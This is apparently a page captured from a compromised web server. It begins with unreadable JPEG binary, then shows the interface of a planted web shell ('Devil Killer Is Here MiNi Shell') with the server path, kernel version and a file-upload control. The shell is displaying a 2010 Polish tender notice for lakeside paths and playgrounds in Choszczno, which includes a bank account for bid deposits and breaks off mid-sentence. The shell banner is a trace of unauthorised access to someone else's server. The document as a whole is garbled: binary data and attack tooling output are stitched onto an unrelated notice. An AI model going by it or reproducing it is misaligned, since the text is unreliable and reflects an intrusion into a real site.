JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100330/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100330/70353-N-2010.html

<p class="kh_header"><b>Choszczno: Turystyczno - rekreacyjne zagospodarowanie terenów wokół jeziora Klukom w miejscowości Choszczno</b><br>
<b>Numer ogłoszenia: 70353 - 2010; data zamieszczenia: 30.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Choszczno , ul. Wolności 24, 73-200 Choszczno, woj. zachodniopomorskie, tel. 095 7659300, faks 095 7659306.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.choszczno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Turystyczno - rekreacyjne zagospodarowanie terenów wokół jeziora Klukom w miejscowości Choszczno.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót obejmujących przebudowę ścieżki wokół jeziora Klukom z wykorzystaniem istniejących chodników oraz ścieżek o nawierzchni nieutwardzonej. Ścieżka posiada charakter ścieżki spacerowej z dopuszczeniem ruchu rowerowego o nawierzchni utwardzonej, mineralnej typu HANSE GRAND oraz z kostki brukowej betonowej i lokalnie granitowej.
Przebieg trasy ścieżki oraz jej profile skorygowano i dopasowano do zmienionej szaty roślinnej oraz ukształtowania terenu ( w stosunku do roku 2001 wystąpiły zmiany ukształtowania terenu na skutek naturalnych osuwisk, skarp, głównie w obszarze leśnym ).

Wzdłuż ścieżki rozmieszczone zostaną elementy małej architektury, jak ławki i kosze na śmieci. 
Trasa ścieżki została zaprojektowana tak by wpisać się w istniejące drzewa. Na odcinkach o gęstym zadrzewieniu, bliskiej granicy brzegu jeziora i wysokich skarp nie można było uniknąć kolizji ścieżki z drzewami, stąd założono konieczność wycinki 43 szt. drzew. 
Na odcinkach, gdzie trasa ścieżki biegnie na zboczu skarpy od strony wykopu należy wykonać murki oporowe przytrzymujące skarpę.
Wzdłuż ścieżki wokół jeziora przewidziano dodatkowe elementy stanowiące odrębną architektonicznie i funkcjonalnie całość - PROMENADĘ oraz dwa place zabaw - DLA MALUCHÓW i SPORTOWY.
Place zabaw będą zabezpieczone od ruchu kołowego oraz od szkodliwych emisji, usytuowane w miejscach nasłonecznionych i o niskim poziomie wód gruntowych. Publiczne place zabaw będą połączone siecią ścieżek z innymi terenami towarzyszącymi. Przy placach zabaw należy wykonać miejsca siedzące dla dorosłych (ławeczki), a same place wyposażyć w odpowiednie urządzenia do zabaw dla dzieci wg planu zagospodarowania terenu.

1 Rozwiązania szczegółowe.
1.1 PROMENADA ( Plansza graficzna U1 )
1.   Nawierzchnie.
Podstawowy ciąg komunikacyjny zaprojektowano utwardzony betonową kostką brukową. W projekcie przyjęto asortyment wg katalogu firmy B-Complex. Przyjęto typ bruku Starobruk Roc Deco - wzór nr 8 ( kostki 1, 2, 3 ). Wątek układania dopasować do promienistego układu krawędzi obrzeżnych.
Elementy nawierzchni :
1)	obrzeża wykonać z  jednej warstwy kostki nr 1 w kolorze szarym,
2)	wewnętrzna mozaika - tyczenie i wypełnienie wg planszy graficznej,
3)	obrzeża oraz wewnętrzne podziały na sektory - z dwóch warstw kostki granitowej 9x9  w kolorze ciemnoszarym,
4)	wypełnienia sektorów z betonowej kostki brukowej wg B-Complex, Starobruk Roc Deco - wzór nr 4, kostki 1, 3 ( zachować promienisty wątek układania ),
5)	wypełnienia sektorów z kostki granitowej - stosować kostkę 4x4 lub 6x6 w kolorze jasnoszarym,
6)	plac gabloty ogłoszeniowej - z betonowej kostki brukowej wg B-Complex, Starobruk Roc Deco - wzór nr 8, koła kręgów w kolorze czerwonym.
2.	Kraty pod drzewa.
Przyjęto elementy wg katalogu firmy Komserwis - linia Jesion, - typ jesion 014105, 014106 oraz 014107, oznaczenie na planszy graficznej Ob.1.6 (a, b, c). Rozmieszczenie wg planszy graficznej. Kraty instalować górną powierzchnią licowaną z nawierzchnią. Przestrzenie pod kratą wypełnić grubym żwirem płukanym.
3.	Siedziska. Przyjęto elementy wg katalogu firmy Komserwis - linia Tunis. Siedziska z oparciem - element nr 001131, oznaczenie na planszy graficznej Ob.1.1a. Siedziska bez oparcia - element nr 001132, oznaczenie na planszy graficznej Ob.1.1b.
4.	Stojaki na rowery. Przyjęto elementy wg katalogu firmy Komserwis - linia Gamma, element nr 008239, oznaczenie na planszy graficznej Ob.1.3.
5.	Gazony. Przyjęto elementy wg katalogu firmy Komserwis - linia Skwer, element nr 130311, Ascendo 1 forma C.
6.	Gablota. Przyjęto elementy wg katalogu firmy Komserwis - linia Wrocław, element nr 009201, oznaczenie na planszy graficznej Ob.1.4.
7.	Pojemniki na odpady. Przyjęto elementy wg katalogu firmy Komserwis - linia Genewa, element nr 003315, oznaczenie na planszy graficznej Ob.1.2.

1.2 PLAC ZABAW NR 1 -  DLA MALUCHÓW  ( Plansza graficzna U2 ) Zaprojektowano plac zabaw dla dzieci młodszych oraz miejsce rekreacji dla ich opiekunów. Plac jest w pełni ogrodzony celem zapewnienia bezpieczeństwa dzieci tam przebywających oraz zapewnienia prawidłowego stanu sanitarnego (ograniczenie dostępności dla zwierząt ).
1.	Ogrodzenie. Przyjęto elementy wg katalogu firmy Betafence. Wszystkie elementy cynkowane i powlekane plastisolem w kolorze zielonym, panele - Bekafor Classic o wymiarach 200 x103 cm, słupki - Bekaklip, brama jednoskrzydłowa -  Bekafor Classic wymiarach 100x103 cm, brama dwuskrzydłowa  Bekafor Classic wymiarach 300x103 cm. - zapewnia możliwość wjazdu małym pojazdom obsługi technicznej.
2.	Nawierzchnie.
1.	Ścieżka - mineralna HANSE GRAND
Bezpośrednio pod siedziskami z oparciem, wzdłuż ścieżki - nawierzchnia z granitowej kostki brukowej 4x4 lub 6x 6. Utwardzenie kostką granitową zapobiega uszkadzaniu nawierzchni mineralnej ścieżki przez szuranie nogami osób siadających.
2)	Nawierzchnia bezpieczna placu zabaw - typu FLEXI-STEP - elastyczna murawa o wymiarach 1x1x0,65 w kolorze czerwonym. Nawierzchnia spełnia wymagania norm PN-EN 1176-1 Wyposażenie placów zabaw i nawierzchnie oraz PN-EN 1177. Nawierzchnie placów zabaw amortyzujące upadki.
3)	Trawniki - w obszarze wygrodzonym należy wykonać założenie od podstaw nawierzchni trawiastej.
4)	Żwirowa - bezpośrednio pod linią obrodzenia wykonać pas szerokości 0,5 m ( gł. 0,15 m ) - zapobiega porastaniu siatki ogrodzenia przez trawy wysokie.
3.	Urządzenia do zabawy. Przyjęto elementy wg katalogu firmy Stilum.
1)	Ascendo 1 forma C - oznaczenie na planszy graficznej Ob.2.4.
2)	Stilum patis 2 - oznaczenie na planszy graficznej Ob.2.5.
3)	Libra 4 - oznaczenie na planszy graficznej Ob.2.6.
4)	Collis - oznaczenie na planszy graficznej Ob.2.7.
5)	Papilo 1 - oznaczenie na planszy graficznej Ob.2.8.
6)	Pandeo - oznaczenie na planszy graficznej Ob.2.9.
7)	piaskownica - indywidualna, obrzeże wykonane z FLEXI-STEP, palisada pojedyńcza, - oznaczenie na planszy graficznej Ob.2.11,
4.	Siedziska. Przyjęto elementy wg katalogu firmy Komserwis - linia Tunis. Siedziska z oparciem - element nr 001131, oznaczenie na planszy graficznej Ob.2.1a.
5.	Zestaw do gry w szachy.  Przyjęto elementy wg katalogu firmy Saterius, produkt nr 4151.
6.	Stojaki na rowery. Przyjęto elementy wg katalogu firmy Komserwis - linia Agora, element nr 008213, oznaczenie na planszy graficznej Ob.2.3.
7.	Pojemniki na odpady - przyjęto elementy wg katalogu firmy Komserwis - linia Genewa, element nr 003315, oznaczenie na planszy graficznej Ob.2.2.
8.	Kompozycja zieleni
1)	nasadzenia - drzewa wokół ścieżki w regularnych odstępach pomiędzy ławkami przewidziano zasadzone Jarząbu pospolitego Sorbus aucuparia, krzewy - dobrane pod względem bezpieczeństwa ( brak roślin toksycznych i kłujących ),  wymagań środowiskowych, różnorodności kształtów i kolorystyki oraz okresów atrakcyjności. W jej skład wchodzić będą kompozycje składające się z zestawów połączonych ze sobą różnych gatunków krzewów, roślin szkieletowych oraz bylin. Schemat ich kompozycji przedstawiony został w legendzie, w części graficznej planszy U2.
2)	dominanta krajobrazowa - kamień polny o wysokości  ok. 1,5 m, otoczony zielenią.

1.3	PLAC ZABAW NR 2 -  SPORTOWY  ( Plansza graficzna U3 ) 
Zaprojektowano plac zabaw dla dzieci starszych, młodzieży oraz dorosłych.
1.    Nawierzchnie.
1)	Ścieżka - mineralna HANSE GRAND bezpieczna pod urządzeniami zabawowymi - piaskowa. Warstwa piasku gr min 20 cm. Piasek powinien być czysty, przesiany, pozbawiony wszelkich elementów ostrych.
2.	Urządzenia do zabawy. Przyjęto elementy wg katalogu firmy Lappset
1)	Pyramid net - oznaczenie na planszy graficznej Ob.3.4.
2)	Surfy - oznaczenie na planszy graficznej Ob.3.5.
3)	Copper - oznaczenie na planszy graficznej Ob.3.6.
4)	Hustawka iron - oznaczenie na planszy graficznej Ob.3.7.
5)	Altana Pavilion - oznaczenie na planszy graficznej Ob.3.8.
3.	Siedziska. Przyjęto elementy wg katalogu firmy Komserwis - linia Haga siedziska bez oparcia - element nr 001304, oznaczenie na planszy graficznej Ob.3.1b
4.	Pojemniki na odpady. Przyjęto elementy wg katalogu firmy Komserwis - linia Genewa, element nr 003315, oznaczenie na planszy graficznej Ob.3.2.
5.	Stojaki na rowery. Przyjęto elementy wg katalogu firmy Komserwis - linia Agora, element nr 008213, oznaczenie na planszy graficznej Ob.3.3.

UWAGA: plansza graficzna U3 zakłada  budowę boiska sportowego - należy nie uwzględniać go w wycenie ponieważ nie jest to przedmiotem niniejszego Zamówienia.
  
1.4	ŚCIEŻKA SPACEROWA -  Plansza graficzna D.2/1 - D.2/15.
Kostka betonowa typu polbruk (cegła bezspoinowa) grubości 6 cm.  
1.	Nawierzchnia projektowana na odcinku 0+000,00 km - 0+390,56 km. Na całym odcinku ciąg komunikacyjny posiada szerokość 2,0 m Kostka betonowa typu polbruk (cegła bezspoinowa) gr. 8 cm - ciąg pieszo-jezdny zapewniający dojazd do działki 827/3 (ośrodek sportu). Nawierzchnia zaprojektowana została o zmiennej szerokości od 3,0 m do 3,5 m (szczegółowe rozwiązanie na planszy D.2/6.
2.	Nawierzchnia projektowana jest na odcinku 1 + 829,37 km - 2 + 025,13 km.
Nawierzchnia z kruszyw mineralnych typu HanseGrand grubości 4 cm.
3.   Nawierzchnia projektowana jest na odcinku: 0 + 507,20 km - 1 + 731,27 km; 2 + 025,13 km - 5 + 556,26 km. Ścieżka na przeważającej długości posiada szerokość 2,0 m. Ze względu na szatę rośliną oraz ukształtowanie terenu ścieżka rekreacyjna została przewężona do 1,5 m na odcinkach: 4 + 359,91 km - 4 + 638,01 km i 4 + 963,83 km -  5 + 167,39 km.
4.	Elementy zabezpieczające konstrukcję nawierzchni ścieżki. Obrzeża betonowe 8x30 cm. W celu zabezpieczenia stateczności, konstrukcję ścieżki ograniczono z obu stron obrzeżem bet. posadawianym na ławie betonowej z oporem wykonywanej z betonu B-10.
5.	Warstwa odsączająca.
Projektowana warstwa grubości 10 cm ma za zadanie zapobiec nawierzchnię przed powstawaniem wysadzin. Warstwę należy wykonać z piasków gruboziarnistych                      o współczynniku wodoprzepuszczalności k = 10-1 - 10-2 cm/s.
Na całej długości ścieżki warstwy nasypu do głębokości 20 cm poniżej warstwy odsączającej należy wykonywać z gruntów przepuszczalnych.
6.	Geowłóknina.
Na podstawie wizji lokalnej i ukształtowaniu ścieżki w profilu podłużnym, na terenach podmokłych, w celu zabezpieczenia konstrukcji nawierzchni, projektuje się geowłókninę szerokości 2,0 m umieszczoną bezpośrednio pod warstwą odsączającą. Geowłókninę należy ułożyć na odcinkach: 0 + 975,70 km - 1 + 110,50 km, 1 + 122,70 km -  1 + 250,00 km oraz 2 + 030,00 km - 3 + 517,75 km. Dodatkowo w związku z występowaniem w podłożu gruntów organicznych geowłókninę należy ułożyć na całej szerokości podstawy nasypu na odcinku od 3 + 400,00 km - 3 + 517,75 km. Ponadto przewiduje się możliwość wykonania lokalnego wzmocnienia konstrukcji nawierzchni przez warstwę z geowłókniny na odcinku ścieżki zlokalizowanej w najniższych miejscach na skarpie, na odcinku od 3 + 600,00km do 5 + 550,00 km. Szczegółowa lokalizacja będzie uzgadniana bezpośrednio na budowie z nadzorem autorskim.
	7.  Murki oporowe
W celu zabezpieczenia ścieżki przed osuwaniem się gruntu ze skarp, projektuje się murki oporowe wykonywane z prostokątnych elementów prefabrykowanych 40x25x60 typu Rasterflor. Gazony układane są na fundamencie grubości 30 cm wykonywanym                z betonu B-15. Fundament posadawiany jest na warstwie odsączającej. Przewiduje się wykonywanie murków o zmiennej wysokości (1 - 4 elementy na wysokość).                         W przypadku wykonywania muru jako skarpa - gazon zlokalizowany bezpośrednio na fundamencie należy wypełnić gruntem przepuszczalnym. Pozostałe gazony należy wypełnić ziemią urodzajną i obsiać. W przypadku muru wykonywanego jako ściana  - gazony należy wypełnić gruntem przepuszczalnym za wyjątkiem elementu szczytowego, który należy wypełnić ziemią urodzajną i obsiać. W przypadku muru o wysokości 4 elementów co 1,5 metra należy zastosować kolumny żelbetowe z B-15, zbrojone prętami śred. 12 mm, kotwione w fundamencie. Gazony, w których zlokalizowane będą kolumny należy wypełnić chudym betonem. Sposób wykonania murów jako ściany czy jako skarpy będzie każdorazowo uzgadniany z nadzorem autorskim na budowie.
	8.   Palisady
Projektowane palisady typu EHL należy wykonać z elementów prefabrykowanych betonowych śred. 11 cm długości 0,6 m oraz śred. 20 cm i długości 1,5 m. Palisady posadawiane są na ławie betonowej z oporem wykonanej z betonu B-15. Głębokość posadowienia palisady w betonie nie może być mniejsza niż ? jej wysokości. Pod ławą betonową należy wykonać warstwę odsączającą.
	9.   Kiszki faszynowe 20x20 cm.
Projektowane kiszki wykonywane są jako elementy mające za zadanie zabezpieczenie podstawy nasypu ścieżki przed rozmywaniem przez wody jeziora Klukom. Kiszki należy wykonać na odcinkach od 3 + 150,00 km do -3 + 517,75 km oraz od 3 + 522,84 km do 5 + 180,00 km.
	10. Dren
Zaprojektowany dren z rur  śred. 100 mm należy wykonać na odcinkach przedstawionych na rysunkach D.3/8 - D.3/11. Szczegół wykonania drenu przedstawiono na rysunkach D.5/2. Wody gromadzone przez dren odprowadzane są poprzez dreny poprzeczne, których lokalizację oraz rzędne wylotu podano na rysunkach D.3/8 - D.3/11.
	11. Schodkowanie skarp (zgodnie z rysunkiem D.5/2)
Na odcinku od 3 + 522,84 km do 5 + 200,00 km w miejscach, gdzie projektowana ścieżka jest poszerzana należy projektowany nasyp połączyć z istniejącym terenem poprzez schodkowanie istniejącego terenu. Technologię wykonania schodkowania skarp przedstawiono na planszy D.5/2.
	12. Kolizje projektowanej ścieżki z drzewami.
Związku z niemożliwością podania jednoznacznych sposobów sytuacyjnego rozwiązania kolizji ścieżki z drzewami, wszelkie takie problemy będą rozwiązywane przez nadzór autorski na bieżąco na budowie. Do zabezpieczenia pnie drzew, które zlokalizowane będą w nasypie ścieżki przewidziano kiszki faszynowe, palisady oraz murki. Sposób zabezpieczenia drzew będzie podawany każdorazowo przez nadzór autorski.
2.2. Ścieżka spacerowa w ul. Bolesława Chrobrego ( Plansza graficzna D.D. 2 ) - koszt niekwalifikowany do dofinansowania zgodnie z załącznikiem 1a do SIWZ
1)	Nawierzchnia ścieżki
- Kostka betonowa typu polbruk (cegła bezspoinowa) grubości 6 cm układana na podsypce cem. - piaskowej (1:4) gr 3-4 cm
-	Podbudowa z kruszywa łamanego 0-31,5 mm stabilizowanego mechanicznie gr. 15 cm
-	Warstwa odsączająca grubości 10 cm - piasek gruboziarnisty 
2)	Obrzeża betonowe 8x30 cm na ławie betonowej B-10 z oporem.
3)	Murki oporowe
Murki oporowe projektuje się z prostokątnych elementów prefabrykowanych 40x25x60 typu Rasterflor. Gazony układane są na fundamencie grubości 30 cm wykonywanym                z betonu B-15. Fundament posadawiany jest na warstwie odsączającej gr. 15 cm. Gazony należy wypełnić gruntem przepuszczalnym za wyjątkiem elementu szczytowego, który należy wypełnić ziemią urodzajną i obsiać.
2	Miejsca postojowe i droga dojazdowa ( Plansza graficzna D.D. 2 )
1)	Nawierzchnia
-	Kostka betonowa typu polbruk grubości 8 cm na podsypce cem. - piaskowej (1:4) gr 3-4 cm
-	Podbudowa z kruszywa łamanego 0-31,5 mm stabilizowanego mechanicznie gr. 20 cm
-	Warstwa odsączająca grubości 10 cm - piasek gruboziarnisty
2)	Krawężniki betonowe 15 x 30 cm na ławie betonowej B-15 z oporem.


UWAGA: w załączniku nr 9 do SIWZ podano specyfikację parametrów technicznych użytkowych urządzeń równoważnych


Szczegółowy zakres wykonania robót zawiera dokumentacja projektowa i specyfikacje techniczne wykonania i odbioru robót, które stanowią załączniki do  specyfikacji.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.27.20-8, 45.11.12.91-4, 45.11.27.00-2, 45.11.12.30-9, 45.11.27.23-9, 45.23.32.53-7, 45.11.12.40-2, 37.53.52.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wysokość wadium ustala się w kwocie 50.000 złotych
słownie : pięćdziesiąt tysięcy złotych.

Wadium w formie pieniężnej należy wnieść przelewem na konto Zamawiającego: 
Bank  GBS o Choszczno 
Nr rachunku :  40 8359 0005 0028 9098 2000 0003 z dopiskiem na blankiecie przelewu: wadium na zabezpieczenie oferty przetargowej -  
Turystyczno - rekreacyjne zagospodarowanie terenów wokół jeziora Klukom w miejscowości Choszczno
Kserokopię dowodu przelewu potwierdzoną za zgodność z oryginałem należy dołączyć do oferty. 
1.	Wadium może być wnoszone w formie: poręczenia bankowego, poręczenia pieniężnego SKOK, gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczeniach udzielanych przez podmioty  o których mowa w art. 6 ust. 3 pkt 4 lit. b ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przed?siębiorczości, które należy w formie nienaruszonego oryginału zdeponować u Pani Marty Deseckiej, Urząd Miejski w Choszcznie, pok. 27, a kopię załączyć do oferty.
2.	Z treści gwarancji powinno wynikać bezwarunkowe i nieodwołalne, na każde pisemne żądanie zgłoszone przez Zamawiającego w okresie związania ofertą, zobowiązanie gwaranta do wypłaty zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a i 5 ustawy P.z.p. 
3.	Treść gwarancji wadialnej musi zawierać następujące elementy:
a)	nazwa i adres Zamawiającego;
b)	określenie przedmiotu zamówienia;
c)	nazwę i adres Wykonawcy.
4.	Wadium musi być wniesione nie później niż do  wyznaczonego terminu składania ofert. 
5.	Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie rachunek bankowy Zamawiającego zostanie uznany pełną kwotą wymaganego wadium.
6.	Wykonawca, który nie wniesie wadium lub nie zabezpieczy oferty akceptowalną formą wadium w wyznaczonym terminie zostanie wykluczony z postępowania, a jego oferta zostanie odrzucona.
7.	Zamawiający zwróci niezwłocznie wadium wszystkim wykonawcom po wyborze oferty najkorzystniejszej, z wyjątkiem wykonawcy, którego oferta została wybrana, jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a ustawy Pzp.
8.	Zamawiający zwróci niezwłocznie wadium wszystkim wykonawcom po unieważnieniu postępowania o udzielenie niniejszego zamówienia publicznego, pod warunkiem, iż odwołanie zostało ostatecznie rozstrzygnięte lub upłynął termin do wnoszenia.
9.	Zamawiający będzie żądał ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium w sytuacji, jak w pkt. 8, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wniesie wadium w terminie określonym przez Zamawiającego.
10.	W przypadku wniesienia odwołania, Zamawiający nie później niż na 7 dni przed upływem ważności wadium, wezwie wykonawców, pod rygorem wykluczenia z postępowania, do przedłużenia ważności wadium albo wniesienia nowego wadium na okres niezbędny do zabezpieczenia postępowania do zawarcia umowy. Jeżeli odwołanie wniesiono po wyborze oferty najkorzystniejszej, wezwanie skieruje jedynie do wykonawcy, którego ofertę wybrano jako najkorzystniejszą.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) wykażą i udokumentują (referencjami, opiniami lub listami polecającymi, protokołami odbioru końcowego), iż w okresie ostatnich 5 lat przed wszczęciem postępowania (tj. w okresie 30.03.2005 - 30.03.2010), a jeżeli okres prowadzenia działalności jest krótszy - w ciągu całego okresu prowadzenia działalności wykonali roboty budowlane w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, przez co należy rozumieć wykonanie min. dwóch robót budowlanych - budowę dróg, chodników, placów, parkingów o nawierzchni z kostki betonowej o powierzchni nie mniejszej niż 1500 m2 każda, ale łączna powierzchnia wszystkich wykonanych nawierzchni nie może być mniejsza niż 4.000 m2
b)   wykonawca może polegać na wiedzy i doświadczeniu innego lub innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunku. W takiej sytuacji wykonawca zobowiązany będzie udowodnić, iż będzie dysponował wiedzą i doświadczeniem niezbędnym do realizacji zamówienia, w szczególności przedstawiając pisemne zobowiązanie i niezbędne dokumenty tych podmiotów do oddania do dyspozycji prawo korzystania z ich wiedzy i doświadczenia na okres korzystania z nich przy wykonywaniu zamówienia, przez co należy rozumieć, że podmiot ten będzie uczestniczył w realizacji zamówienia albo przekaże wykonawcy - na czas realizacji zamówienia, kadrę kierowania budową posiadającą wiedzę i doświadczenie w realizacji zamówienia ( wg pkt. III 3. 4 ),</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponują lub będą dysponować narzędziami, wyposażeniem zakładu i urządzeniami technicznymi niezbędnymi do realizacji zamówienia,</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	dysponują lub będą dysponować osobami zdolnymi do wykonania zamówienia tj.: kierownika budowy z uprawnieniami do wykonywania samodzielnych funkcji w budownictwie o specjalności drogowej lub konstrukcyjno - budowlanej bez ograniczeń,
